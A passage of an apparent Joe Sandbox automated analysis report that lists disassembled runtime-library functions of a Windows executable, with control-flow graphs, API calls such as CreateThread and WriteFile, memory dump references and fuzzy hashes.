6f5b46-6f5b4b call 6f5377 137->144 150 6f5b29-6f5b2b 138->150 148 6f5b41-6f5b44 143->148 144->148 148->150 150->110
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3907804496
                                                                                    • Opcode ID: 16e253cf7d0717d77c1c177372a4ea17c802cb6c2df06780785734fa756709ef
                                                                                    • Instruction ID: 6f256a92303e733b3c34a394e202499a6f2722d417eb0a1859db650273bf4490
                                                                                    • Opcode Fuzzy Hash: 16e253cf7d0717d77c1c177372a4ea17c802cb6c2df06780785734fa756709ef
                                                                                    • Instruction Fuzzy Hash: 52B1E270A04A4DAFDB11DF99C891BBE7BB3AF45320F148158E7129B392C7709D42CB65
                                                                                    Function 006F27AA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 6f27aa-6f27b6 152 6f2848-6f284b 151->152 153 6f27bb-6f27cc 152->153 154 6f2851 152->154 156 6f27ce-6f27d1 153->156 157 6f27d9-6f27f2 LoadLibraryExW 153->157 155 6f2853-6f2857 154->155 158 6f27d7 156->158 159 6f2871-6f2873 156->159 160 6f2858-6f2868 157->160 161 6f27f4-6f27fd GetLastError 157->161 163 6f2845 158->163 159->155 160->159 162 6f286a-6f286b FreeLibrary 160->162 164 6f27ff-6f2811 call 6f1ed8 161->164 165 6f2836-6f2843 161->165 162->159 163->152 164->165 168 6f2813-6f2825 call 6f1ed8 164->168 165->163 168->165 171 6f2827-6f2834 LoadLibraryExW 168->171 171->160 171->165
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A418D8C2,?,006F28B7,?,?,?,00000000), ref: 006F286B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 1e00d2a8648546267496d1ae15215397481ac3e6c110aead2176d8eb131da900
                                                                                    • Instruction ID: 7dfb0d62a690308559be037b2104d37102783b1a9232fd64e0a3507498ee1244
                                                                                    • Opcode Fuzzy Hash: 1e00d2a8648546267496d1ae15215397481ac3e6c110aead2176d8eb131da900
                                                                                    • Instruction Fuzzy Hash: 0B210832A0021AE7D7319B25DC65FAA375ABB413F0F104224EE16A73D0DA34ED05CEE4
                                                                                    Function 006E6A98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 213 6e6a98-6e6aad WaitForSingleObjectEx 214 6e6aaf-6e6ab4 213->214 215 6e6ae1-6e6ae3 213->215 217 6e6acc-6e6adf FindCloseChangeNotification 214->217 218 6e6ab6-6e6ac5 GetExitCodeThread 214->218 216 6e6ae4-6e6ae6 215->216 217->216 218->215 219 6e6ac7-6e6aca 218->219 219->217
                                                                                    APIs
                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E2333,?,?,00000000), ref: 006E6AA4
                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,?,006E2333,?,?,00000000), ref: 006E6ABD
                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,006E2333,?,?,00000000), ref: 006E6ACF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
                                                                                    • String ID: 3#n
                                                                                    • API String ID: 3816883391-3452942821
                                                                                    • Opcode ID: 60671adca30b5b618e97532934937f38947569e514ae74001fbdc5f0c12e2d8f
                                                                                    • Instruction ID: f3d639237c5d8da9f53ea6c68d38e398d58c67a55489f1a9910917cba4668eef
                                                                                    • Opcode Fuzzy Hash: 60671adca30b5b618e97532934937f38947569e514ae74001fbdc5f0c12e2d8f
                                                                                    • Instruction Fuzzy Hash: 95F08271941215EBDB108F29DC09B9A3B69EB117B0F288320F926E62E0DB74DD81D784
                                                                                    Function 006EB763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00708A98,0000000C), ref: 006EB776
                                                                                    • ExitThread.KERNEL32 ref: 006EB77D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1611280651-2555016830
                                                                                    • Opcode ID: d32fb7c3e8bbeb5d2f93278f65f0026b86d0ec3a5934db0a58e7ec012db43c74
                                                                                    • Instruction ID: 5a3e38ff9fbfb56440278870549fcb0559d18048c5350ccec061bbecaa762e5d
                                                                                    • Opcode Fuzzy Hash: d32fb7c3e8bbeb5d2f93278f65f0026b86d0ec3a5934db0a58e7ec012db43c74
                                                                                    • Instruction Fuzzy Hash: BFF08C71900309DFDB41ABB1C84AB6E3B66EF50710F20425EF10297292CF3899018BA9
                                                                                    Function 006EB8BF Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 239 6eb8bf-6eb8ca 240 6eb8cc-6eb8df call 6ec900 call 6ec802 239->240 241 6eb8e0-6eb8f3 call 6eb86f 239->241 247 6eb8f5-6eb912 CreateThread 241->247 248 6eb921 241->248 250 6eb914-6eb920 GetLastError call 6ec8a6 247->250 251 6eb930-6eb935 247->251 252 6eb923-6eb92f call 6eb7e1 248->252 250->248 255 6eb93c-6eb940 251->255 256 6eb937-6eb93a 251->256 255->252 256->255
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(?,?,Function_0000B763,00000000,00000000,?), ref: 006EB908
                                                                                    • GetLastError.KERNEL32(?,?,?,?,006E22F4,00000000,00000000,006E38DA,00000000,00000000), ref: 006EB914
                                                                                    • __dosmaperr.LIBCMT ref: 006EB91B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2744730728-0
                                                                                    • Opcode ID: 7e8311fcfacb709ee3eecad6e5f1acb57d2bcea3fcc4e22745468c6075e2f1e5
                                                                                    • Instruction ID: 78798a0551726f96ab09f297f8f9294c6c8cc70b7bc13a196e9fe82dbd51f43f
                                                                                    • Opcode Fuzzy Hash: 7e8311fcfacb709ee3eecad6e5f1acb57d2bcea3fcc4e22745468c6075e2f1e5
                                                                                    • Instruction Fuzzy Hash: CF01B172912349AFDF15AFA2DC06BEF3BAAEF40360F004128F90192251DB70CE10DB94
                                                                                    Function 006EB818 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 259 6eb818-6eb825 call 6f243a 262 6eb827-6eb82f 259->262 263 6eb865-6eb868 ExitThread 259->263 262->263 264 6eb831-6eb835 262->264 265 6eb83c-6eb842 264->265 266 6eb837 call 6f2d4d 264->266 268 6eb84f-6eb855 265->268 269 6eb844-6eb846 265->269 266->265 268->263 270 6eb857-6eb859 268->270 269->268 271 6eb848-6eb849 CloseHandle 269->271 270->263 272 6eb85b-6eb85f FreeLibraryAndExitThread 270->272 271->268 272->263
                                                                                    APIs
                                                                                      • Part of subcall function 006F243A: GetLastError.KERNEL32(00000000,?,006EC905,006F1F64,?,?,006F2336,00000001,00000364,?,00000006,000000FF,?,006EB788,00708A98,0000000C), ref: 006F243E
                                                                                      • Part of subcall function 006F243A: SetLastError.KERNEL32(00000000), ref: 006F24E0
                                                                                    • CloseHandle.KERNEL32(?,?,?,006EB94F,?,?,006EB7C1,00000000), ref: 006EB849
                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,006EB94F,?,?,006EB7C1,00000000), ref: 006EB85F
                                                                                    • ExitThread.KERNEL32 ref: 006EB868
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 1991824761-0
                                                                                    • Opcode ID: fa031088fee6198586c4a58bbc6f1b8bc59dbc218b04d91d2d5e163eadc2dc2b
                                                                                    • Instruction ID: 251b07a2bad15975b66a477fec83c399465b986d8e1369c868e8b4edd1dfcd50
                                                                                    • Opcode Fuzzy Hash: fa031088fee6198586c4a58bbc6f1b8bc59dbc218b04d91d2d5e163eadc2dc2b
                                                                                    • Instruction Fuzzy Hash: 45F05E30411788ABCB211B67C808BDB3A9E6F00320F089715F968D63B4DB34DC418AA4
                                                                                    Function 006EFFCC Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,006EFFC6,006ECA0D,006ECA0D,?,00000002,A418D8C2,006ECA0D,00000002), ref: 006EFFDD
                                                                                    • TerminateProcess.KERNEL32(00000000,?,006EFFC6,006ECA0D,006ECA0D,?,00000002,A418D8C2,006ECA0D,00000002), ref: 006EFFE4
                                                                                    • ExitProcess.KERNEL32 ref: 006EFFF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 585bc280639b0ad112cdf4bb7e606aae2f552e67be1a7143286fb14429025030
                                                                                    • Instruction ID: 7666b177e196dce1d367bc6209122bf6f7b91a23d5bfa1545c46538be1f2e729
                                                                                    • Opcode Fuzzy Hash: 585bc280639b0ad112cdf4bb7e606aae2f552e67be1a7143286fb14429025030
                                                                                    • Instruction Fuzzy Hash: FED06731000148EBEF512F61DC09F593F2ABF41361F04C114BA095A122DF3999529A98
                                                                                    Function 006F425A Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 280 6f425a-6f4279 281 6f427f-6f4281 280->281 282 6f4453 280->282 283 6f42ad-6f42d3 281->283 284 6f4283-6f42a2 call 6ec785 281->284 285 6f4455-6f4459 282->285 287 6f42d9-6f42df 283->287 288 6f42d5-6f42d7 283->288 291 6f42a5-6f42a8 284->291 287->284 290 6f42e1-6f42eb 287->290 288->287 288->290 292 6f42ed-6f42f8 call 6f5deb 290->292 293 6f42fb-6f4306 call 6f3dde 290->293 291->285 292->293 298 6f4348-6f435a 293->298 299 6f4308-6f430d 293->299 302 6f435c-6f4362 298->302 303 6f43ab-6f43cb WriteFile 298->303 300 6f430f-6f4313 299->300 301 6f4332-6f4346 call 6f39a4 299->301 304 6f441b-6f442d 300->304 305 6f4319-6f4328 call 6f3d76 300->305 322 6f432b-6f432d 301->322 309 6f4399-6f43a4 call 6f3e5c 302->309 310 6f4364-6f4367 302->310 307 6f43cd-6f43d3 GetLastError 303->307 308 6f43d6 303->308 311 6f442f-6f4435 304->311 312 6f4437-6f4449 304->312 305->322 307->308 316 6f43d9-6f43e4 308->316 321 6f43a9 309->321 317 6f4369-6f436c 310->317 318 6f4387-6f4397 call 6f4020 310->318 311->282 311->312 312->291 323 6f444e-6f4451 316->323 324 6f43e6-6f43eb 316->324 317->304 325 6f4372-6f437d call 6f3f37 317->325 327 6f4382-6f4385 318->327 321->327 322->316 323->285 328 6f43ed-6f43f2 324->328 329 6f4419 324->329 325->327 327->322 331 6f440b-6f4414 call 6ec8c9 328->331 332 6f43f4-6f4406 328->332 329->304 331->291 332->291
                                                                                    APIs
                                                                                      • Part of subcall function 006F39A4: GetConsoleOutputCP.KERNEL32(A418D8C2,00000000,00000000,006ECCE4), ref: 006F3A07
                                                                                    • WriteFile.KERNEL32(FFB05FE8,00000000,?,006ECC04,00000000,00000000,00000000,00000000,006EC9DA,?,006ECC04,006EC9DA,00000024,00708AD8,00000010,006ECCE4), ref: 006F43C3
                                                                                    • GetLastError.KERNEL32(?,006ECC04,006EC9DA,00000024,00708AD8,00000010,006ECCE4,006EC9DA,?,00000000,00000004), ref: 006F43CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                    • String ID:
                                                                                    • API String ID: 2915228174-0
                                                                                    • Opcode ID: 7cf72de5654b28dbbb6e771c09409367836263a3050973542f388a1ba92ff7fb
                                                                                    • Instruction ID: 981f13c336a812a7f16b5a7e4e8b26abc9e8432b3c5bd3a6bfce0b03718d8090
                                                                                    • Opcode Fuzzy Hash: 7cf72de5654b28dbbb6e771c09409367836263a3050973542f388a1ba92ff7fb
                                                                                    • Instruction Fuzzy Hash: AF61A472D0414DAEDF118FA8C844BFFBBBAAF09314F044059EA10B7642DB35DA02CB64
                                                                                    Function 006F3E5C Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 335 6f3e5c-6f3eb1 call 6e7dc0 338 6f3f26-6f3f36 call 6e701e 335->338 339 6f3eb3 335->339 341 6f3eb9 339->341 343 6f3ebf-6f3ec1 341->343 344 6f3edb-6f3f00 WriteFile 343->344 345 6f3ec3-6f3ec8 343->345 348 6f3f1e-6f3f24 GetLastError 344->348 349 6f3f02-6f3f0d 344->349 346 6f3eca-6f3ed0 345->346 347 6f3ed1-6f3ed9 345->347 346->347 347->343 347->344 348->338 349->338 350 6f3f0f-6f3f1a 349->350 350->341 351 6f3f1c 350->351 351->338
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,006ECCE4,?,006F43A9,?,00000000,00000000,?,00000000,00000000), ref: 006F3EF8
                                                                                    • GetLastError.KERNEL32(?,006F43A9,?,00000000,00000000,?,00000000,00000000,00000000,006EC9DA,?,006ECC04,006EC9DA,00000024,00708AD8,00000010), ref: 006F3F1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastWrite
                                                                                    • String ID:
                                                                                    • API String ID: 442123175-0
                                                                                    • Opcode ID: 5699017fded25db4007d8783dbd19bcd72af557a231cbb63078770cd18f264d5
                                                                                    • Instruction ID: 629b1f6f04210fa0a261611bb82a27be71c7c37d72a7635372e6a2e0272f7d5f
                                                                                    • Opcode Fuzzy Hash: 5699017fded25db4007d8783dbd19bcd72af557a231cbb63078770cd18f264d5
                                                                                    • Instruction Fuzzy Hash: BE219130A0026DDBCB15CF19DD80AEDB7BAEF48315F1441AAEA06D7311E630DE46CB64
                                                                                    Function 006F3513 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 352 6f3513-6f3518 353 6f351a-6f3532 352->353 354 6f3534-6f3538 353->354 355 6f3540-6f3549 353->355 354->355 356 6f353a-6f353e 354->356 357 6f355b 355->357 358 6f354b-6f354e 355->358 359 6f35b5-6f35b9 356->359 362 6f355d-6f356a GetStdHandle 357->362 360 6f3557-6f3559 358->360 361 6f3550-6f3555 358->361 359->353 363 6f35bf-6f35c2 359->363 360->362 361->362 364 6f356c-6f356e 362->364 365 6f3597-6f35a9 362->365 364->365 367 6f3570-6f3579 GetFileType 364->367 365->359 366 6f35ab-6f35ae 365->366 366->359 367->365 368 6f357b-6f3584 367->368 369 6f358c-6f358f 368->369 370 6f3586-6f358a 368->370 369->359 371 6f3591-6f3595 369->371 370->359 371->359
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006F355F
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 006F3571
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: be0c211a41970c390816f78097a615a94a2abbd7e944c486febb17c949821e33
                                                                                    • Instruction ID: b88dbe8da5b7ce2b9d0c953d052660cdfc915c5e0664f464570a7de8e8246186
                                                                                    • Opcode Fuzzy Hash: be0c211a41970c390816f78097a615a94a2abbd7e944c486febb17c949821e33
                                                                                    • Instruction Fuzzy Hash: 0611E67110876986C7344E3E8C88676BA96A7D6374B380B1ED3B6873F1C734DB86D640
                                                                                    Function 006F22E9 Relevance: 2.6, APIs: 2, Instructions: 71COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 423 6f22e9-6f22fd GetLastError 424 6f22ff-6f2307 call 6f2ac6 423->424 425 6f2319-6f2323 call 6f2b05 423->425 430 6f2309-6f2312 424->430 431 6f2314 424->431 432 6f2329-6f2331 call 6f1f12 425->432 433 6f2325-6f2327 425->433 434 6f238e-6f2397 SetLastError 430->434 431->425 436 6f2336-6f233c 432->436 433->434 437 6f239e-6f23a3 call 6ec9ca 434->437 438 6f2399-6f239d 434->438 440 6f234f-6f235d call 6f2b05 436->440 441 6f233e-6f234d call 6f2b05 436->441 447 6f235f-6f236d call 6f2b05 440->447 448 6f2376-6f238b call 6f2117 call 6f1f6f 440->448 449 6f236e-6f2374 call 6f1f6f 441->449 447->449 456 6f238d 448->456 449->456 456->434
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                    • SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1452528299-0
                                                                                    • Opcode ID: ad478ca7c1c67d9743e0fea632da5e53521dac430fc9d7681b01d8588e3bb1cb
                                                                                    • Instruction ID: 8caf1d2c9bcc29af486b58cde051951d94c84217f8fe91eed1b2d5028a983a8a
                                                                                    • Opcode Fuzzy Hash: ad478ca7c1c67d9743e0fea632da5e53521dac430fc9d7681b01d8588e3bb1cb
                                                                                    • Instruction Fuzzy Hash: E21106B320931FFAD7516BB45CE6F7A235FAB057A8F100228F710951A2EE184C0589A9
                                                                                    Function 006E292C Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID:
                                                                                    • API String ID: 3886170330-0
                                                                                    • Opcode ID: 6df883c9864256a2329e09c98b26b7fdd452908505a6763f8d95f13fbb227e23
                                                                                    • Instruction ID: 6ff10009c46f210bcc6d44f2f8cc17d703171cadedcdd8916ef819fcefeb09bb
                                                                                    • Opcode Fuzzy Hash: 6df883c9864256a2329e09c98b26b7fdd452908505a6763f8d95f13fbb227e23
                                                                                    • Instruction Fuzzy Hash: 3A414C74A01245CFD724DF6AD4A4DA9B7F7FF54310B19825DE4099B3A2CB399C42CB04
                                                                                    Function 006E33A0 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
